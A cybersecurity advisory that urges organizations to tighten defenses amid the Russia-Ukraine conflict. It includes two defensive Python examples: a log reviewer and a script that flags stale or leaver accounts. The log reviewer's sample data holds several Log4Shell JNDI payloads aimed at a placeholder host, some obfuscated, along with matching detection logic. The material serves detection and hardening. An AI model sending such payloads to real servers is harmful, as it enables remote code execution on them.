As a result of the escalated conflict between Ukraine and Russia, the risk of cyber attacks on Western organizations is particularly high. Organizations in critical infrastructure sectors that provide essential services need to be on high alert. In recent weeks, Russian threat groups have already demonstrated their capabilities by targeting the Ukrainian government and financial institutions.
National cybersecurity agencies around the world have issued guidance on the threat from Russia, including CISA in the United States, the NCSC in the United Kingdom and the CCB in Belgium. We currently have no specific threat intelligence indicating that attacks outside Ukraine will occur, but organizations should raise their security posture now as a precaution.
Emergency security advice
Talk to your cybersecurity staff and partners about how to quickly secure your assets. You may have difficulty determining priorities. The answer is simple: everything has priority. Spot it recommends the following guidelines for all organizations:
Leverage your Chief Information Security Officer (CISO) and the team
Your CISO is a cybersecurity expert and should be empowered to make executive decisions about your security policies. The CISO must:
- Enforce internal security policies
- Tighten domain block lists
- Prioritize and delegate the implementation of security measures
- Create and test an incident response plan
Closing visibility gaps
- Make sure you actively monitor every asset in every domain. The following five controls are the absolute minimum an organization must have:
- EDR/XDR for each endpoint
- Email security
- DNS monitoring and blocking
- Firewall and IDS/IPS logs
- Active Directory domain(s) security controls
- Ensure that these logs are centrally collected and monitored for suspicious activity by your internal or external SOC.
- Go through the logs daily for unexpected behavior, such as:
- Outgoing connections to unknown domains and IPs
- New or uncategorized domains
- TOR traffic
- Log4j (Log4Shell, CVE-2021-44228) exploitation payloads in inbound requests
- Guest Wi-Fi users
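As an added illustration of the daily log review above (this is example code written for this article, not a tool from the original page), the script below runs three of those checks over a constructed, SIEM-normalized connection log: outbound connections to domains outside an approved list or straight to an IP, destinations on a Tor relay list (the list, the internal ranges and the log format are all assumptions; in practice you would load the published Tor relay list and your proxy's categorization data), and Log4Shell payloads. The Log4j check unwraps the common obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) before looking for `${jndi:`, because a plain substring match misses them.

```python
import ipaddress
import re
from typing import Dict, List

# Constructed sample log (not from any real environment). Assumed SIEM-normalized format,
# one connection or request per line:
#   <timestamp> <src_ip> <dst_host or -> <dst_ip> <dst_port> <request>
SAMPLE_LOG = """\
2022-03-01T08:01:12Z 10.0.5.21 updates.example.com 198.51.100.10 443 GET /patches HTTP/1.1
2022-03-01T08:02:43Z 10.0.5.33 mail.example.com 198.51.100.25 443 GET /owa HTTP/1.1
2022-03-01T08:05:09Z 10.0.5.21 xk3f9qz.example.net 203.0.113.77 443 GET / HTTP/1.1
2022-03-01T08:07:51Z 10.0.5.40 - 203.0.113.9 9001 CONNECT
2022-03-01T08:09:30Z 192.0.2.66 www.example.com 198.51.100.10 80 GET /?q=${jndi:ldap://203.0.113.55/a} HTTP/1.1
2022-03-01T08:10:02Z 192.0.2.66 www.example.com 198.51.100.10 80 GET /login HTTP/1.1 UA=${${lower:j}ndi:rmi://203.0.113.55/b}
2022-03-01T08:11:40Z 192.0.2.66 www.example.com 198.51.100.10 80 GET /x HTTP/1.1 UA=${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.55/c}
"""

# Constructed reference data (assumptions): internal ranges, the domains your proxy already
# categorizes as approved, and a Tor relay list (load the published Tor relay list in practice).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
KNOWN_DOMAINS = {"example.com"}
TOR_RELAYS = {"203.0.113.9"}
TOR_PORTS = {9001, 9030}  # default ORPort/DirPort: a weak hint only, never proof

_LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d+) (.*)$")


def normalize_log4j(text: str) -> str:
    """Unwrap the lookup tricks used to hide ${jndi: (${lower:j}, ${::-j}, ${env:X:-j} ...)."""
    prev = None
    while prev != text:  # every substitution shortens the string, so this terminates
        prev = text
        text = _LOOKUP_CASE.sub(r"\1", text)
        text = _LOOKUP_DEFAULT.sub(r"\1", text)
    return text.lower()


def is_log4j_payload(text: str) -> bool:
    return "${jndi:" in normalize_log4j(text)


def review_line(line: str) -> List[str]:
    """Findings for one log line; an empty list means nothing suspicious."""
    m = _LINE.match(line)
    if not m:
        return ["unparsable line"]
    _ts, src, host, dst, port, request = m.groups()
    try:
        src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    except ValueError:
        return ["unparsable address"]
    findings = []
    if any(src_ip in net for net in INTERNAL_NETS):  # outbound: inspect the destination
        if host == "-":
            findings.append("direct-to-IP connection, no hostname")
        elif not any(host == d or host.endswith("." + d) for d in KNOWN_DOMAINS):
            findings.append(f"unknown/uncategorized domain {host}")
        if str(dst_ip) in TOR_RELAYS:
            findings.append("destination is a known Tor relay")
        elif int(port) in TOR_PORTS:
            findings.append(f"Tor-like port {port}")
    if is_log4j_payload(request):  # inbound and outbound alike
        findings.append("Log4Shell (JNDI lookup) payload in request")
    return findings


def review_log(log: str) -> Dict[int, List[str]]:
    """Map 1-based line number -> findings, for the lines that produced any finding."""
    result = {}
    for number, line in enumerate(log.splitlines(), 1):
        findings = review_line(line)
        if findings:
            result[number] = findings
    return result


if __name__ == "__main__":
    for number, findings in review_log(SAMPLE_LOG).items():
        print(f"line {number}: " + "; ".join(findings))
```

On the constructed log, lines 1 and 2 (known domains, normal ports) produce nothing, line 3 is flagged for an uncategorized domain, line 4 for a hostname-less connection to a Tor relay, and lines 5 to 7 for Log4Shell payloads in plain, `${lower:}` and `${::-}` obfuscated form. The port heuristic is deliberately subordinate to the relay list: a 9001 hit on its own is worth a look, not an incident.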
Ideally, every asset in your organization is patched as soon as the vendor releases a security update. That includes:
- All computers – Windows, Mac, Linux/Unix, Chromebooks, …
- All smartphones and tablets
- Firewalls and network hardware
- IoT devices
- CCTV system
- Access control, door systems, …
In reality, many organizations struggle to implement a patch management policy that covers everything in a timely manner. This is where a vulnerability management solution comes in handy. A good vulnerability management solution identifies which patches should be installed first to reduce the biggest risks for the organization (typically those that are exploited in the wild or sit on internet-exposed systems), so that the IT team can use the available time efficiently.
Switch to short-term priorities
- Have your cyber emergency plan ready. We recommend developing, updating and testing your incident response plan.
- If a security upgrade was planned for next year, do it now, even if that means working overtime.
- Deploy MFA everywhere (especially on remote access services) and consider moving administrative accounts to hardware-backed MFA such as FIDO2 security keys.
- Restrict access to systems to the personnel who actually need it. This also applies to SharePoint, OneDrive and other cloud storage solutions.
- Disable, and then delete, old, unnecessary or unused accounts, especially those of staff who have left the company.
- Reduce the external attack surface by closing unused or non-critical ports and services exposed to the internet.
- Back up critical systems and data and keep a copy offline. Test the restore procedure regularly.
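To make the account clean-up item above concrete, here is an added example (written for this article, not code from the original page) that takes a directory export and an HR leaver list and returns the enabled accounts that should be disabled now, flagging members of privileged groups so they are handled first. The export, the leaver list, the column names and the group names are constructed assumptions; the 90-day idle threshold is a common choice, not a standard.

```python
import csv
import io
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, Optional

# Constructed account export (not from any real directory). "lastlogon" is empty when the
# account has never signed in. Column names are an assumption about your export format.
ACCOUNT_EXPORT = """\
samaccountname,enabled,lastlogon,whencreated,memberof
jdoe,True,2022-02-27T09:12:00Z,2019-05-01T00:00:00Z,Domain Users
svc_backup,True,2022-02-28T01:00:00Z,2018-01-15T00:00:00Z,Domain Users;Backup Operators
old_contractor,True,2021-09-10T16:40:00Z,2020-03-02T00:00:00Z,Domain Users;Remote Access
mrossi,True,2022-02-25T08:00:00Z,2017-06-20T00:00:00Z,Domain Users;Domain Admins
temp_vpn,True,,2021-08-01T00:00:00Z,Remote Access
dormant_admin,True,2021-06-01T12:00:00Z,2016-02-10T00:00:00Z,Domain Users;Domain Admins
disabled_old,False,2020-01-01T00:00:00Z,2015-01-01T00:00:00Z,Domain Users
"""

# Constructed HR leaver list and the groups you consider privileged (both assumptions).
LEAVERS = {"old_contractor", "mrossi"}
PRIVILEGED_GROUPS = {"Domain Admins", "Backup Operators", "Remote Access"}
AS_OF = datetime(2022, 3, 1, tzinfo=timezone.utc)


def _parse_ts(value: str) -> Optional[datetime]:
    if not value:
        return None
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_accounts_to_disable(export: str, leavers: Iterable[str], as_of: datetime,
                             max_idle_days: int = 90) -> Dict[str, List[str]]:
    """Return {account: reasons} for enabled accounts that should be disabled now.

    Reasons: the owner has left, the account has not logged on within max_idle_days, or it
    was created more than max_idle_days ago and never logged on. Privileged membership is
    appended as an extra reason so those accounts can be prioritized.
    """
    leavers = set(leavers)
    idle_cutoff = as_of - timedelta(days=max_idle_days)
    flagged: Dict[str, List[str]] = {}
    for row in csv.DictReader(io.StringIO(export)):
        if row["enabled"] != "True":
            continue  # already disabled; deletion is a separate, later clean-up step
        name = row["samaccountname"]
        reasons = []
        if name in leavers:
            reasons.append("owner has left the company")
        last, created = _parse_ts(row["lastlogon"]), _parse_ts(row["whencreated"])
        if last is None:
            if created is not None and created < idle_cutoff:
                reasons.append(f"never logged on, created more than {max_idle_days} days ago")
        elif last < idle_cutoff:
            reasons.append(f"no logon for more than {max_idle_days} days (last {last.date()})")
        if reasons:
            privileged = set(row["memberof"].split(";")) & PRIVILEGED_GROUPS
            if privileged:
                reasons.append("PRIVILEGED: member of " + ", ".join(sorted(privileged)))
            flagged[name] = reasons
    return flagged


def prioritized(flagged: Dict[str, List[str]]) -> List[str]:
    """Account names, privileged ones first, then alphabetically."""
    return sorted(flagged, key=lambda n: (not any(r.startswith("PRIVILEGED") for r in flagged[n]), n))


if __name__ == "__main__":
    result = find_accounts_to_disable(ACCOUNT_EXPORT, LEAVERS, AS_OF)
    for name in prioritized(result):
        print(f"{name}: " + "; ".join(result[name]))
```

Note that `mrossi` is flagged despite a recent logon, purely because HR says the person has left: recent activity on a leaver's account is a reason to act faster, not slower. Run the output past the account owners' managers before disabling, and keep service accounts such as `svc_backup` on a separate review track, since their last-logon data is often misleading.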